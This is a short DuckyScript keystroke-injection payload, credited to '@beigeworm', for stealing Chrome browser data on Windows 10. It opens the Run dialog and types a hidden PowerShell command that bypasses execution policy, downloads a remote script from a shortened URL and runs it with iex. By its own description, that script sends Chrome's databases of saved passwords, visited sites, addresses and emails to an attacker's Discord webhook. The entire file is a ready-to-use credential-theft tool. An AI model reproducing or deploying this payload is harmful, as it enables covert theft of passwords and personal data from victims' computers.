REM Title: Chrome DB to Discord
REM Author: @beigeworm
REM Description: Chrome stores visited websites, password entries, Address entries, email entries and more inside database files
REM Description: They can be extracted to a discord chat and viewed in something like 'DB Browser'.
REM Target: Windows 10

REM Replace YOUR_WEBHOOK_HERE with your Discord webhook URL

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwchdbdc | iex
ENTER


